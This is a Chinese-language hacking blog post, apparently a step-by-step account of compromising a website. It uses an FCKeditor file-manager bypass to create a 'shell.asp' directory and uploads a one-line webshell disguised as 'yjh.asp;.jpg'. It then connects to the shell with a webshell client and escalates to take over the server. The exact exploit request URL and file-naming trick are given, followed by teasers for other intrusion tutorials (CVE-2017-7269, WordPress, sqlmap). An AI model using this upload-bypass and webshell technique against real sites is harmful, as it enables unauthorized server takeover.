找了个添加新闻的地方,点击上传图片→浏览服务器,如下图:
然后新建一个文件夹,命名为 qxz.asp 如下图:
但是被自动命名变成了 qxz_asp 如下图:
下面我们就要用到绕过代码来突破了,代码如下:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
把上面的代码加在网站链接后面,按下回车。如:http://www.xxx.com/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
OK成功
然后关掉此页面,再次点击添加图片 浏览服务器。自动创建了一个 shell.asp 的文件夹
然后把一句话改名为 yjh.asp;.jpg 上传一句话马到此文件夹中。
OK菜刀链接地址 http://www.xxx.com/Upload/image/shell.asp/yjh_asp;.jpg
最后上大马,经过一翻提权战斗,终于拿下了这台服务器,天色不早了,提权过程就不写了。
什么叫SolarWinds? SolarWinds服务器防火墙安全性管理工具(FSM)针对必须在其重要安全防护设备上开展汇报和权威专家管理方法的机构和企业而言是一个非常好的解决方法。该商品的设定和配...
今天第三篇实例教程,大家立即用CVE-2017-7269系统漏洞开展一次实战演练检测。三篇文章内容你融汇贯通了,基础算黑客入门了。 微软公司层面也早已确定了该系统漏洞:Windows...
什么是Acunetix WVS? Acunetix是一个Web漏洞检测程序流程,可全自动查验Web程序运行的系统漏洞,比如跨网站脚本制作,SQL引入,身份认证网页页面上的明文密码抗压强度和随意文件创...
WP程序,广受国内外站长们的喜爱,也因此,WP程序的安全也是一直以来做的不错的,说到入侵WP博客,小菜也没经验,完全是找了些这类的文章看了下,然后自己在琢磨点思路,所以还请看官们勿喷呐~ 1...
Sqlmap是一个技术专业的SQL引入专用工具,使用方法也许多,实际可以用"sqlmap -hh"查询详细的指令帮助文件,我这仅仅给大伙儿共享一些最常见的Sqlmap用法: 一、Sql...
什么叫P0f? p0f是一种处于被动指纹验证专用工具,能够 鉴别您联接的设备,联接到您的小盒子的设备,乃至联接在小盒子周边的设备,即便该机器设备坐落于数据文件服务器防火墙后边。 P0f...